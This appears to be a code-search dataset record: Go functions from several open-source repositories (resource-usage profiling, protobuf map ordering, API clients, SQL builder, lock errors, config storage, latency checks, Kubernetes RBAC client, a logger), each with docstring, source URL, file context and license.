if b, err := GetBound(c); err == nil && !b {
iab.nb[offset] |= mask
}
}
return iab
} | Apache License 2.0 |
mhausenblas/right-size-guide | main.go | export | go | func export(ifs, pfs Findings, exportfile, outputformat, target string) {
fs := map[string]Findings{
"idle": ifs,
"peak": pfs,
}
data, err := json.MarshalIndent(fs, "", " ")
if err != nil {
log.Printf("Can't serialize findings: %v\n", err)
}
outputformat = strings.ToLower(outputformat)
switch outputformat {
case "json":
switch {
case exportfile != "":
log.Printf("Exporting findings as JSON to %v", exportfile)
err := ioutil.WriteFile(exportfile, data, 0644)
if err != nil {
log.Printf("Can't export findings: %v\n", err)
}
default:
w := bufio.NewWriter(os.Stdout)
_, err := w.Write(data)
if err != nil {
log.Printf("Can't export findings: %v\n", err)
}
w.Flush()
}
case "openmetrics":
var buffer bytes.Buffer
buffer.WriteString(emito("idle_memory",
"gauge",
"The idle state memory consumption",
fmt.Sprintf("%d", ifs.MemoryMaxRSS),
map[string]string{"target": target, "unit": "kB"}))
buffer.WriteString(emito("idle_cpu_user",
"gauge",
"The idle state CPU consumption in user land",
fmt.Sprintf("%d", ifs.CPUuser),
map[string]string{"target": target, "unit": "microsec"}))
buffer.WriteString(emito("idle_cpu_sys",
"gauge",
"The idle state CPU consumption in the kernel",
fmt.Sprintf("%d", ifs.CPUsys),
map[string]string{"target": target, "unit": "microsec"}))
if pfs.MemoryMaxRSS != 0 {
buffer.WriteString(emito("peak_memory",
"gauge",
"The peak state memory consumption",
fmt.Sprintf("%d", pfs.MemoryMaxRSS),
map[string]string{"target": target, "unit": "kB"}))
buffer.WriteString(emito("peak_cpu_user",
"gauge",
"The peak state CPU consumption in user land",
fmt.Sprintf("%d", pfs.CPUuser),
map[string]string{"target": target, "unit": "microsec"}))
buffer.WriteString(emito("peak_cpu_sys",
"gauge",
"The peak state CPU consumption in the kernel",
fmt.Sprintf("%d", pfs.CPUsys),
map[string]string{"target": target, "unit": "microsec"}))
}
switch {
case exportfile != "":
log.Printf("Exporting findings in OpenMetrics format to %v", exportfile)
err := ioutil.WriteFile(exportfile, buffer.Bytes(), 0644)
if err != nil {
log.Printf("Can't export findings: %v\n", err)
}
default:
w := bufio.NewWriter(os.Stdout)
_, err := w.Write(buffer.Bytes())
if err != nil {
log.Printf("Can't export findings: %v\n", err)
}
w.Flush()
}
default:
log.Printf("Can't export findings, unknown output format selected, please use json or openmetrics")
}
} | export writes the findings to a file, or to stdout if exportfile is empty | https://github.com/mhausenblas/right-size-guide/blob/d3774daa0aebc562ebd1e7dcb477d57cd94e4964/main.go#L161-L241 | package main
import (
"bufio"
"bytes"
"encoding/json"
"flag"
"fmt"
"io/ioutil"
"log"
"net/http"
"os"
"os/exec"
"strings"
"syscall"
"time"
)
type Findings struct {
MemoryMaxRSS int64 `json:"memory_in_bytes"`
CPUuser int64 `json:"cpuuser_in_usec"`
CPUsys int64 `json:"cpusys_in_usec"`
}
var (
version = "dev"
commit = "none"
date = "unknown"
)
var icmd, pcmd *exec.Cmd
var idlef, peakf chan Findings
func main() {
flag.Usage = func() {
fmt.Printf("Usage:\n %s --target $BINARY \n [--api-path $HTTP_URL_PATH --api-port $HTTP_PORT --peak-delay $TIME_MS --sampletime-idle $TIME_SEC --sampletime-peak $TIME_SEC --export-findings $FILE --output json|openmetrics]\n", os.Args[0])
fmt.Println("Example usage:\n rsg --target test/test --api-path /ping --api-port 8080 2>/dev/null")
fmt.Println("Arguments:")
flag.PrintDefaults()
}
target := flag.String("target", "", "The filesystem path of the binary or script to assess")
idlest := flag.Int("sampletime-idle", 2, "[OPTIONAL] The time in seconds to perform idle resource usage assessment")
peakst := flag.Int("sampletime-peak", 10, "[OPTIONAL] The time in seconds to perform peak resource usage assessment")
apibaseurl := flag.String("api-baseurl", "http://127.0.0.1", "[OPTIONAL] The base URL component of the HTTP API to use for peak resource usage assessment")
apipath := flag.String("api-path", "", "[OPTIONAL] The URL path component of the HTTP API to use for peak resource usage assessment")
apiport := flag.String("api-port", "", "[OPTIONAL] The TCP port of the HTTP API to use for peak resource usage assessment")
peakdelay := flag.Int("delay-peak", 10, "[OPTIONAL] The time in milliseconds to wait between two consecutive HTTP GET requests for peak resource usage assessment")
exportfile := flag.String("export-findings", "", "[OPTIONAL] The filesystem path to export findings to; if not provided the results will be written to stdout")
outputformat := flag.String("output", "json", "[OPTIONAL] The output format, valid values are 'json' and 'openmetrics'")
showversion := flag.Bool("version", false, "Print the version of rsg and exit")
flag.Parse()
if *showversion {
fmt.Printf("%v, commit %v, built at %v\n", version, commit, date)
os.Exit(0)
}
if len(os.Args) == 0 || *target == "" {
fmt.Printf("Need at least the target program to proceed\n\n")
flag.Usage()
os.Exit(1)
}
isampletime := time.Duration(*idlest) * time.Second
psampletime := time.Duration(*peakst) * time.Second
peakhammerpause := time.Duration(*peakdelay) * time.Millisecond
idlef = make(chan Findings, 1)
peakf = make(chan Findings, 1)
icmd = exec.Command(*target)
pcmd = exec.Command(*target)
ifs := Findings{}
pfs := Findings{}
go assessidle()
<-time.After(isampletime)
log.Printf("Idle state assessment of %v completed\n", *target)
if icmd.Process != nil {
err := icmd.Process.Signal(os.Interrupt)
if err != nil {
log.Fatalf("Can't stop process: %v\n", err)
}
}
ifs = <-idlef
log.Printf("Found idle state resource usage. MEMORY: %vkB CPU: %vms (user)/%vms (sys)",
ifs.MemoryMaxRSS/1000,
ifs.CPUuser/1000,
ifs.CPUsys/1000)
if *apipath != "" && *apiport != "" {
go assesspeak(*apibaseurl, *apiport, *apipath, peakhammerpause)
<-time.After(psampletime)
log.Printf("Peak state assessment of %v completed\n", *target)
if pcmd.Process != nil {
err := pcmd.Process.Signal(os.Interrupt)
if err != nil {
log.Fatalf("Can't stop process: %v\n", err)
}
}
pfs = <-peakf
log.Printf("Found peak state resource usage. MEMORY: %vkB CPU: %vms (user)/%vms (sys)",
pfs.MemoryMaxRSS/1000,
pfs.CPUuser/1000,
pfs.CPUsys/1000)
}
export(ifs, pfs, *exportfile, *outputformat, *target)
}
func assessidle() {
log.Printf("Launching %v for idle state resource usage assessment", icmd.Path)
log.Println("Trying to determine idle state resource usage (no external traffic)")
icmd.Run()
f := Findings{}
if icmd.ProcessState != nil {
f.MemoryMaxRSS = int64(icmd.ProcessState.SysUsage().(*syscall.Rusage).Maxrss)
f.CPUuser = int64(icmd.ProcessState.SysUsage().(*syscall.Rusage).Utime.Usec)
f.CPUsys = int64(icmd.ProcessState.SysUsage().(*syscall.Rusage).Stime.Usec)
}
idlef <- f
}
func assesspeak(apibaseurl, apiport, apipath string, peakhammerpause time.Duration) {
log.Printf("Launching %v for peak state resource usage assessment", pcmd.Path)
log.Printf("Trying to determine peak state resource usage using %v:%v%v", apibaseurl, apiport, apipath)
go stress(apibaseurl, apiport, apipath, peakhammerpause)
pcmd.Run()
f := Findings{}
if pcmd.ProcessState != nil {
f.MemoryMaxRSS = int64(pcmd.ProcessState.SysUsage().(*syscall.Rusage).Maxrss)
f.CPUuser = int64(pcmd.ProcessState.SysUsage().(*syscall.Rusage).Utime.Usec)
f.CPUsys = int64(pcmd.ProcessState.SysUsage().(*syscall.Rusage).Stime.Usec)
}
peakf <- f
}
func stress(apibaseurl, apiport, apipath string, peakhammerpause time.Duration) {
time.Sleep(1 * time.Second)
ep := fmt.Sprintf("%v:%v%v", apibaseurl, apiport, apipath)
log.Printf("Starting to hammer %v every %v", ep, peakhammerpause)
for {
_, err := http.Get(ep)
if err != nil {
log.Println(err)
}
time.Sleep(peakhammerpause)
}
} | Apache License 2.0 |
gaowanliang/lightuploader | vendor/google.golang.org/protobuf/internal/order/range.go | RangeEntries | go | func RangeEntries(es EntryRanger, less KeyOrder, fn VisitEntry) {
if less == nil {
es.Range(fn)
return
}
p := mapEntryPool.Get().(*[]mapEntry)
entries := (*p)[:0]
defer func() {
if cap(entries) < 1024 {
*p = entries
mapEntryPool.Put(p)
}
}()
es.Range(func(k pref.MapKey, v pref.Value) bool {
entries = append(entries, mapEntry{k, v})
return true
})
sort.Slice(entries, func(i, j int) bool {
return less(entries[i].k, entries[j].k)
})
for _, e := range entries {
if !fn(e.k, e.v) {
return
}
}
} | RangeEntries iterates over the entries of es according to the specified order. | https://github.com/gaowanliang/lightuploader/blob/c41dcb1e6afffc046ef25eb17b187a034051e92e/vendor/google.golang.org/protobuf/internal/order/range.go#L84-L115 | package order
import (
"sort"
"sync"
pref "google.golang.org/protobuf/reflect/protoreflect"
)
type messageField struct {
fd pref.FieldDescriptor
v pref.Value
}
var messageFieldPool = sync.Pool{
New: func() interface{} { return new([]messageField) },
}
type (
FieldRanger interface{ Range(VisitField) }
VisitField = func(pref.FieldDescriptor, pref.Value) bool
)
func RangeFields(fs FieldRanger, less FieldOrder, fn VisitField) {
if less == nil {
fs.Range(fn)
return
}
p := messageFieldPool.Get().(*[]messageField)
fields := (*p)[:0]
defer func() {
if cap(fields) < 1024 {
*p = fields
messageFieldPool.Put(p)
}
}()
fs.Range(func(fd pref.FieldDescriptor, v pref.Value) bool {
fields = append(fields, messageField{fd, v})
return true
})
sort.Slice(fields, func(i, j int) bool {
return less(fields[i].fd, fields[j].fd)
})
for _, f := range fields {
if !fn(f.fd, f.v) {
return
}
}
}
type mapEntry struct {
k pref.MapKey
v pref.Value
}
var mapEntryPool = sync.Pool{
New: func() interface{} { return new([]mapEntry) },
}
type (
EntryRanger interface{ Range(VisitEntry) }
VisitEntry = func(pref.MapKey, pref.Value) bool
) | MIT License |
manifoldco/manifold-cli | clients/clients.go | NewConnector | go | func NewConnector(cfg *config.Config) (*conClient.Connector, error) {
u, err := deriveURL(cfg, "connector")
if err != nil {
return nil, err
}
c := conClient.DefaultTransportConfig()
c.WithHost(u.Host)
c.WithBasePath(u.Path)
c.WithSchemes([]string{u.Scheme})
transport := httptransport.New(c.Host, c.BasePath, c.Schemes)
transport.Transport = newRoundTripper(transport.Transport)
authToken := retrieveToken(cfg)
if authToken != "" {
transport.DefaultAuthentication = NewBearerToken(authToken)
}
return conClient.New(transport, strfmt.Default), nil
} | NewConnector returns a new swagger generated client for the Connector service | https://github.com/manifoldco/manifold-cli/blob/35f39e985233bf0e3e858c933c5485bf01335856/clients/clients.go#L168-L188 | package clients
import (
"fmt"
"net/http"
"net/url"
"os"
"github.com/go-openapi/runtime"
httptransport "github.com/go-openapi/runtime/client"
"github.com/go-openapi/strfmt"
"github.com/manifoldco/manifold-cli/config"
aClient "github.com/manifoldco/manifold-cli/generated/activity/client"
bClient "github.com/manifoldco/manifold-cli/generated/billing/client"
cClient "github.com/manifoldco/manifold-cli/generated/catalog/client"
conClient "github.com/manifoldco/manifold-cli/generated/connector/client"
iClient "github.com/manifoldco/manifold-cli/generated/identity/client"
mClient "github.com/manifoldco/manifold-cli/generated/marketplace/client"
pClient "github.com/manifoldco/manifold-cli/generated/provisioning/client"
)
const defaultUserAgent = "manifold-cli"
const EnvManifoldToken string = "MANIFOLD_API_TOKEN"
func newRoundTripper(next http.RoundTripper) http.RoundTripper {
version := config.Version
if version != "" {
version = "-" + version
}
return &roundTripper{
next: next,
userAgent: defaultUserAgent + version,
}
}
type roundTripper struct {
next http.RoundTripper
userAgent string
}
func (rt *roundTripper) RoundTrip(req *http.Request) (*http.Response, error) {
req.Header.Set("User-Agent", rt.userAgent)
return rt.next.RoundTrip(req)
}
func NewIdentity(cfg *config.Config) (*iClient.Identity, error) {
u, err := deriveURL(cfg, "identity")
if err != nil {
return nil, err
}
c := iClient.DefaultTransportConfig()
c.WithHost(u.Host)
c.WithBasePath(u.Path)
c.WithSchemes([]string{u.Scheme})
transport := httptransport.New(c.Host, c.BasePath, c.Schemes)
transport.Transport = newRoundTripper(transport.Transport)
authToken := retrieveToken(cfg)
if authToken != "" {
transport.DefaultAuthentication = NewBearerToken(authToken)
}
return iClient.New(transport, strfmt.Default), nil
}
func NewMarketplace(cfg *config.Config) (*mClient.Marketplace, error) {
u, err := deriveURL(cfg, "marketplace")
if err != nil {
return nil, err
}
c := mClient.DefaultTransportConfig()
c.WithHost(u.Host)
c.WithBasePath(u.Path)
c.WithSchemes([]string{u.Scheme})
transport := httptransport.New(c.Host, c.BasePath, c.Schemes)
transport.Transport = newRoundTripper(transport.Transport)
authToken := retrieveToken(cfg)
if authToken != "" {
transport.DefaultAuthentication = NewBearerToken(authToken)
}
return mClient.New(transport, strfmt.Default), nil
}
func NewBilling(cfg *config.Config) (*bClient.Billing, error) {
u, err := deriveURL(cfg, "billing")
if err != nil {
return nil, err
}
c := bClient.DefaultTransportConfig()
c.WithHost(u.Host)
c.WithBasePath(u.Path)
c.WithSchemes([]string{u.Scheme})
transport := httptransport.New(c.Host, c.BasePath, c.Schemes)
authToken := retrieveToken(cfg)
if authToken != "" {
transport.DefaultAuthentication = NewBearerToken(authToken)
}
return bClient.New(transport, strfmt.Default), nil
}
func NewActivity(cfg *config.Config) (*aClient.Activity, error) {
u, err := deriveURL(cfg, "activity")
if err != nil {
return nil, err
}
c := aClient.DefaultTransportConfig()
c.WithHost(u.Host)
c.WithBasePath(u.Path)
c.WithSchemes([]string{u.Scheme})
transport := httptransport.New(c.Host, c.BasePath, c.Schemes)
authToken := retrieveToken(cfg)
if authToken != "" {
transport.DefaultAuthentication = NewBearerToken(authToken)
}
return aClient.New(transport, strfmt.Default), nil
}
func NewProvisioning(cfg *config.Config) (*pClient.Provisioning, error) {
u, err := deriveURL(cfg, "provisioning")
if err != nil {
return nil, err
}
c := pClient.DefaultTransportConfig()
c.WithHost(u.Host)
c.WithBasePath(u.Path)
c.WithSchemes([]string{u.Scheme})
transport := httptransport.New(c.Host, c.BasePath, c.Schemes)
transport.Transport = newRoundTripper(transport.Transport)
authToken := retrieveToken(cfg)
if authToken != "" {
transport.DefaultAuthentication = NewBearerToken(authToken)
}
return pClient.New(transport, strfmt.Default), nil
} | BSD 3-Clause New or Revised License |
code-hex/sqb | conjunction.go | Or | go | func Or(left, right stmt.Expr, exprs ...stmt.Expr) *stmt.Or {
ret := &stmt.Or{
Left: left,
Right: right,
}
for _, expr := range exprs {
ret = &stmt.Or{
Left: ret,
Right: expr,
}
}
return ret
} | Or creates a statement for the OR boolean expression with parentheses.
For more details, see stmt.Or. | https://github.com/code-hex/sqb/blob/42b5fcd18eccac19cc6af0d2e079e193a6bfd125/conjunction.go#L34-L46 | package sqb
import (
"sort"
"github.com/Code-Hex/sqb/stmt"
)
func Paren(expr stmt.Expr) *stmt.Paren {
return &stmt.Paren{
Expr: expr,
}
}
func And(left, right stmt.Expr, exprs ...stmt.Expr) *stmt.And {
ret := &stmt.And{
Left: left,
Right: right,
}
for _, expr := range exprs {
ret = &stmt.And{
Left: ret,
Right: expr,
}
}
return ret
} | MIT License |
cirello-io/pglock | errors.go | Unwrap | go | func (err *OtherError) Unwrap() error {
return err.error
} | Unwrap returns the next error in the error chain. | https://github.com/cirello-io/pglock/blob/b7e79115660cde7c524e1b333d56183985a475de/errors.go#L74-L76 | package pglock
import (
"errors"
"fmt"
)
type NotExistError struct {
error
}
func (err *NotExistError) Unwrap() error {
return err.error
}
func (err *NotExistError) Error() string {
return fmt.Sprintf("not exists: %s", err.error)
}
type UnavailableError struct {
error
}
func (err *UnavailableError) Unwrap() error {
return err.error
}
func (err *UnavailableError) Error() string {
return fmt.Sprintf("unavailable: %s", err.error)
}
type FailedPreconditionError struct {
error
}
func (err *FailedPreconditionError) Unwrap() error {
return err.error
}
func (err *FailedPreconditionError) Error() string {
return fmt.Sprintf("failed precondition: %s", err.error)
}
type OtherError struct {
error
} | Apache License 2.0 |
nbjahan/launchbar-livedic | vendor/src/github.com/nbjahan/go-launchbar/config.go | GetInt | go | func (c *Config) GetInt(key string) int64 {
if c.data[key] == nil {
return 0
}
i, ok := c.data[key].(float64)
if !ok {
return 0
}
return int64(i)
} | GetInt gets the value from config for the key as int64 | https://github.com/nbjahan/launchbar-livedic/blob/e318d3264c1d204f95027d44187c27c9f70d6171/vendor/src/github.com/nbjahan/go-launchbar/config.go#L72-L81 | package launchbar
import (
"encoding/json"
"fmt"
"io/ioutil"
"os"
"path"
"time"
)
type ConfigValues map[string]interface{}
type Config struct {
path string
data map[string]interface{}
}
func NewConfig(p string) *Config {
return loadConfig(p)
}
func NewConfigDefaults(p string, defaults ConfigValues) *Config {
config := loadConfig(p)
for k, v := range defaults {
if _, found := config.data[k]; !found {
config.data[k] = v
}
}
config.save()
return config
}
func (c *Config) Delete(keys ...string) {
for _, key := range keys {
delete(c.data, key)
}
c.save()
}
func (c *Config) Set(key string, val interface{}) {
if !path.IsAbs(c.path) || path.Dir(path.Dir(c.path)) != os.ExpandEnv("$HOME/Library/Application Support/LaunchBar/Action Support") {
panic(fmt.Sprintf("bad config path: %q", c.path))
}
c.data[key] = val
c.save()
}
func (c *Config) Get(key string) interface{} {
return c.data[key]
}
func (c *Config) GetString(key string) string {
if c.data[key] == nil {
return ""
}
return fmt.Sprintf("%v", c.data[key])
} | MIT License |
fanpei91/torsniff | vendor/github.com/spf13/pflag/bool.go | BoolVarP | go | func BoolVarP(p *bool, name, shorthand string, value bool, usage string) {
flag := CommandLine.VarPF(newBoolValue(value, p), name, shorthand, usage)
flag.NoOptDefVal = "true"
} | BoolVarP is like BoolVar, but accepts a shorthand letter that can be used after a single dash. | https://github.com/fanpei91/torsniff/blob/e81c7078285c96c91bbbb2f2580199f8f3f61bae/vendor/github.com/spf13/pflag/bool.go#L66-L69 | package pflag
import "strconv"
type boolFlag interface {
Value
IsBoolFlag() bool
}
type boolValue bool
func newBoolValue(val bool, p *bool) *boolValue {
*p = val
return (*boolValue)(p)
}
func (b *boolValue) Set(s string) error {
v, err := strconv.ParseBool(s)
*b = boolValue(v)
return err
}
func (b *boolValue) Type() string {
return "bool"
}
func (b *boolValue) String() string { return strconv.FormatBool(bool(*b)) }
func (b *boolValue) IsBoolFlag() bool { return true }
func boolConv(sval string) (interface{}, error) {
return strconv.ParseBool(sval)
}
func (f *FlagSet) GetBool(name string) (bool, error) {
val, err := f.getFlagType(name, "bool", boolConv)
if err != nil {
return false, err
}
return val.(bool), nil
}
func (f *FlagSet) BoolVar(p *bool, name string, value bool, usage string) {
f.BoolVarP(p, name, "", value, usage)
}
func (f *FlagSet) BoolVarP(p *bool, name, shorthand string, value bool, usage string) {
flag := f.VarPF(newBoolValue(value, p), name, shorthand, usage)
flag.NoOptDefVal = "true"
}
func BoolVar(p *bool, name string, value bool, usage string) {
BoolVarP(p, name, "", value, usage)
} | MIT License |
vdobler/ht | ht/latency.go | quantile | go | func quantile(x []int, p float64) float64 {
if len(x) == 0 {
return 0
}
N := float64(len(x))
if p < 2.0/(3.0*(N+1.0/3.0)) {
return float64(x[0])
}
if p >= (N-1.0/3.0)/(N+1.0/3.0) {
return float64(x[len(x)-1])
}
h := (N+1.0/3.0)*p + 1.0/3.0
fh := math.Floor(h)
xl := x[int(fh)-1]
xr := x[int(fh)]
return float64(xl) + (h-fh)*float64(xr-xl)
} | https://en.wikipedia.org/wiki/Quantile formula R-8 | https://github.com/vdobler/ht/blob/39624426aab937a68ebc9c82a1cab74d7a0d3d24/ht/latency.go#L294-L312 | package ht
import (
"bufio"
"encoding/csv"
"fmt"
"io"
"io/ioutil"
"math"
"os"
"sort"
"strconv"
"strings"
"sync"
"time"
"github.com/vdobler/ht/cookiejar"
"github.com/vdobler/ht/errorlist"
)
func init() {
RegisterCheck(&Latency{})
}
type Latency struct {
N int `json:",omitempty"`
Concurrent int `json:",omitempty"`
Limits string `json:",omitempty"`
IndividualSessions bool `json:",omitempty"`
SkipChecks bool `json:",omitempty"`
DumpTo string `json:",omitempty"`
limits []latLimit
}
type latLimit struct {
q float64
max time.Duration
}
func (L *Latency) Execute(t *Test) error {
var dumper io.Writer
switch L.DumpTo {
case "":
dumper = ioutil.Discard
case "stdout":
dumper = os.Stdout
case "stderr":
dumper = os.Stderr
default:
file, err := os.OpenFile(L.DumpTo, os.O_CREATE|os.O_APPEND|os.O_WRONLY, 0644)
if err != nil {
return err
}
defer file.Close()
buffile := bufio.NewWriter(file)
defer buffile.Flush()
dumper = buffile
}
csvWriter := csv.NewWriter(dumper)
defer csvWriter.Flush()
tests, err := L.produceTestSet(t)
if err != nil {
return err
}
averageRT := L.warmup(tests)
offset := averageRT / time.Duration(L.Concurrent)
conc := L.Concurrent
resultCh := make(chan latencyResult, 3*L.Concurrent)
data := make([]latencyResult, L.N)
done := make(chan bool)
started := time.Now()
go func() {
for i := 0; i < len(data) && time.Since(started) < 3*time.Minute; i++ {
data[i] = <-resultCh
}
close(done)
}()
wg := &sync.WaitGroup{}
for i := 0; i < conc; i++ {
wg.Add(1)
go func(ex *Test, id int) {
for running := true; running; {
ex.Run()
lr := latencyResult{
status: ex.Result.Status,
started: ex.Result.Started,
duration: ex.Response.Duration,
execBy: id,
}
select {
case <-done:
running = false
default:
select {
case resultCh <- lr:
default:
}
}
}
wg.Done()
}(tests[i], i)
time.Sleep(offset)
}
wg.Wait()
var errs errorlist.List
counters := make([]int, Bogus+1)
seen := uint64(0)
for _, res := range data {
counters[res.status]++
seen |= 1 << uint(res.execBy)
}
if counters[NotRun] > 0 {
errs = errs.Append(fmt.Errorf("Check timed out, got only %d measurements",
L.N-counters[NotRun]))
} else if counters[Pass] != L.N {
errs = errs.Append(fmt.Errorf("Got %d Fail, %d Error, %d Bogus",
counters[Fail], counters[Error], counters[Bogus]))
}
if seen != (uint64(1)<<uint(conc))-1 {
errs = errs.Append(fmt.Errorf("Not all %d concurrent workers did provide a result (%x)",
L.Concurrent, seen))
}
if L.DumpTo != "" {
fields := make([]string, 7)
fields[0] = t.Name
fields[1] = fmt.Sprintf("%d", L.Concurrent)
if len(data) == L.N {
fields[2] = "check completed"
} else {
fields[2] = "stopped early"
}
for _, d := range data {
fields[3] = d.status.String()
fields[4] = fmt.Sprintf("%d", d.execBy)
fields[5] = d.started.Format(time.RFC3339Nano)
fields[6] = d.duration.Truncate(10 * time.Microsecond).String()
csvWriter.Write(fields)
}
}
latencies := make([]int, len(data))
for i, r := range data {
latencies[i] = int(r.duration) / int(time.Millisecond)
}
sort.Ints(latencies)
for _, lim := range L.limits {
lat := time.Millisecond * time.Duration(quantile(latencies, lim.q))
t.infof("Latency quantil (conc=%d) %0.2f%% ≤ %d ms",
conc, lim.q*100, lat/time.Millisecond)
if lat > lim.max {
errs = errs.Append(fmt.Errorf("%.2f%% = %s > limit %s",
100*lim.q, lat, lim.max))
}
}
return errs.AsError()
}
func (L *Latency) produceTestSet(t *Test) ([]*Test, error) {
tests := make([]*Test, L.Concurrent)
for i := range tests {
cpy, err := Merge(t)
if err != nil {
return nil, err
}
cpy.Name = fmt.Sprintf("Latency-Test %d", i+1)
checks := []Check{}
for _, c := range t.Checks {
if _, lt := c.(*Latency); L.SkipChecks || lt {
continue
}
checks = append(checks, c)
}
cpy.Checks = checks
cpy.Execution.Verbosity = 0
if t.Jar != nil {
if L.IndividualSessions {
cpy.Jar, _ = cookiejar.New(nil)
} else {
cpy.Jar = t.Jar
}
}
tests[i] = cpy
}
return tests, nil
}
func (L *Latency) warmup(tests []*Test) time.Duration {
wg := &sync.WaitGroup{}
started := time.Now()
prewarmed := 0
for prewarm := 0; prewarm < 2; prewarm++ {
for _, t := range tests {
prewarmed++
wg.Add(1)
go func(ex *Test) {
ex.Run()
wg.Done()
}(t)
}
wg.Wait()
}
return time.Since(started) / time.Duration(prewarmed)
}
type latencyResult struct {
status Status
started time.Time
duration time.Duration
execBy int
} | BSD 3-Clause New or Revised License |
kubernetes-csi/csi-lib-utils | vendor/k8s.io/client-go/kubernetes/typed/rbac/v1alpha1/rolebinding.go | Patch | go | func (c *roleBindings) Patch(ctx context.Context, name string, pt types.PatchType, data []byte, opts v1.PatchOptions, subresources ...string) (result *v1alpha1.RoleBinding, err error) {
result = &v1alpha1.RoleBinding{}
err = c.client.Patch(pt).
Namespace(c.ns).
Resource("rolebindings").
Name(name).
SubResource(subresources...).
VersionedParams(&opts, scheme.ParameterCodec).
Body(data).
Do(ctx).
Into(result)
return
} | Patch applies the patch and returns the patched roleBinding. | https://github.com/kubernetes-csi/csi-lib-utils/blob/a2ccb594bb74b61a0655d3431c6365a6a567c7af/vendor/k8s.io/client-go/kubernetes/typed/rbac/v1alpha1/rolebinding.go#L170-L182 | package v1alpha1
import (
"context"
json "encoding/json"
"fmt"
"time"
v1alpha1 "k8s.io/api/rbac/v1alpha1"
v1 "k8s.io/apimachinery/pkg/apis/meta/v1"
types "k8s.io/apimachinery/pkg/types"
watch "k8s.io/apimachinery/pkg/watch"
rbacv1alpha1 "k8s.io/client-go/applyconfigurations/rbac/v1alpha1"
scheme "k8s.io/client-go/kubernetes/scheme"
rest "k8s.io/client-go/rest"
)
type RoleBindingsGetter interface {
RoleBindings(namespace string) RoleBindingInterface
}
type RoleBindingInterface interface {
Create(ctx context.Context, roleBinding *v1alpha1.RoleBinding, opts v1.CreateOptions) (*v1alpha1.RoleBinding, error)
Update(ctx context.Context, roleBinding *v1alpha1.RoleBinding, opts v1.UpdateOptions) (*v1alpha1.RoleBinding, error)
Delete(ctx context.Context, name string, opts v1.DeleteOptions) error
DeleteCollection(ctx context.Context, opts v1.DeleteOptions, listOpts v1.ListOptions) error
Get(ctx context.Context, name string, opts v1.GetOptions) (*v1alpha1.RoleBinding, error)
List(ctx context.Context, opts v1.ListOptions) (*v1alpha1.RoleBindingList, error)
Watch(ctx context.Context, opts v1.ListOptions) (watch.Interface, error)
Patch(ctx context.Context, name string, pt types.PatchType, data []byte, opts v1.PatchOptions, subresources ...string) (result *v1alpha1.RoleBinding, err error)
Apply(ctx context.Context, roleBinding *rbacv1alpha1.RoleBindingApplyConfiguration, opts v1.ApplyOptions) (result *v1alpha1.RoleBinding, err error)
RoleBindingExpansion
}
type roleBindings struct {
client rest.Interface
ns string
}
func newRoleBindings(c *RbacV1alpha1Client, namespace string) *roleBindings {
return &roleBindings{
client: c.RESTClient(),
ns: namespace,
}
}
func (c *roleBindings) Get(ctx context.Context, name string, options v1.GetOptions) (result *v1alpha1.RoleBinding, err error) {
result = &v1alpha1.RoleBinding{}
err = c.client.Get().
Namespace(c.ns).
Resource("rolebindings").
Name(name).
VersionedParams(&options, scheme.ParameterCodec).
Do(ctx).
Into(result)
return
}
func (c *roleBindings) List(ctx context.Context, opts v1.ListOptions) (result *v1alpha1.RoleBindingList, err error) {
var timeout time.Duration
if opts.TimeoutSeconds != nil {
timeout = time.Duration(*opts.TimeoutSeconds) * time.Second
}
result = &v1alpha1.RoleBindingList{}
err = c.client.Get().
Namespace(c.ns).
Resource("rolebindings").
VersionedParams(&opts, scheme.ParameterCodec).
Timeout(timeout).
Do(ctx).
Into(result)
return
}
func (c *roleBindings) Watch(ctx context.Context, opts v1.ListOptions) (watch.Interface, error) {
var timeout time.Duration
if opts.TimeoutSeconds != nil {
timeout = time.Duration(*opts.TimeoutSeconds) * time.Second
}
opts.Watch = true
return c.client.Get().
Namespace(c.ns).
Resource("rolebindings").
VersionedParams(&opts, scheme.ParameterCodec).
Timeout(timeout).
Watch(ctx)
}
func (c *roleBindings) Create(ctx context.Context, roleBinding *v1alpha1.RoleBinding, opts v1.CreateOptions) (result *v1alpha1.RoleBinding, err error) {
result = &v1alpha1.RoleBinding{}
err = c.client.Post().
Namespace(c.ns).
Resource("rolebindings").
VersionedParams(&opts, scheme.ParameterCodec).
Body(roleBinding).
Do(ctx).
Into(result)
return
}
func (c *roleBindings) Update(ctx context.Context, roleBinding *v1alpha1.RoleBinding, opts v1.UpdateOptions) (result *v1alpha1.RoleBinding, err error) {
result = &v1alpha1.RoleBinding{}
err = c.client.Put().
Namespace(c.ns).
Resource("rolebindings").
Name(roleBinding.Name).
VersionedParams(&opts, scheme.ParameterCodec).
Body(roleBinding).
Do(ctx).
Into(result)
return
}
func (c *roleBindings) Delete(ctx context.Context, name string, opts v1.DeleteOptions) error {
return c.client.Delete().
Namespace(c.ns).
Resource("rolebindings").
Name(name).
Body(&opts).
Do(ctx).
Error()
}
func (c *roleBindings) DeleteCollection(ctx context.Context, opts v1.DeleteOptions, listOpts v1.ListOptions) error {
var timeout time.Duration
if listOpts.TimeoutSeconds != nil {
timeout = time.Duration(*listOpts.TimeoutSeconds) * time.Second
}
return c.client.Delete().
Namespace(c.ns).
Resource("rolebindings").
VersionedParams(&listOpts, scheme.ParameterCodec).
Timeout(timeout).
Body(&opts).
Do(ctx).
Error()
} | Apache License 2.0 |
mosn/pkg | registry/dubbo/common/logger/logger.go | SetLoggerLevel | go | func SetLoggerLevel(level string) bool {
if l, ok := logger.(OpsLogger); ok {
l.SetLoggerLevel(level)
return true
}
return false
} | SetLoggerLevel is used to set the logger level | https://github.com/mosn/pkg/blob/96b01e984d6257832ebc21cc6934232e1f97a35c/registry/dubbo/common/logger/logger.go#L131-L137 | package logger
import (
"io/ioutil"
"path"
"github.com/dubbogo/getty"
perrors "github.com/pkg/errors"
"go.uber.org/zap"
"go.uber.org/zap/zapcore"
"gopkg.in/yaml.v2"
)
var (
logger Logger
)
type DubboLogger struct {
Logger
dynamicLevel zap.AtomicLevel
}
type Logger interface {
Info(args ...interface{})
Warn(args ...interface{})
Error(args ...interface{})
Debug(args ...interface{})
Infof(fmt string, args ...interface{})
Warnf(fmt string, args ...interface{})
Errorf(fmt string, args ...interface{})
Debugf(fmt string, args ...interface{})
}
func InitLog(logConfFile string) error {
if logConfFile == "" {
InitLogger(nil)
return perrors.New("log configure file name is nil")
}
if path.Ext(logConfFile) != ".yml" {
InitLogger(nil)
return perrors.Errorf("log configure file name{%s} suffix must be .yml", logConfFile)
}
confFileStream, err := ioutil.ReadFile(logConfFile)
if err != nil {
InitLogger(nil)
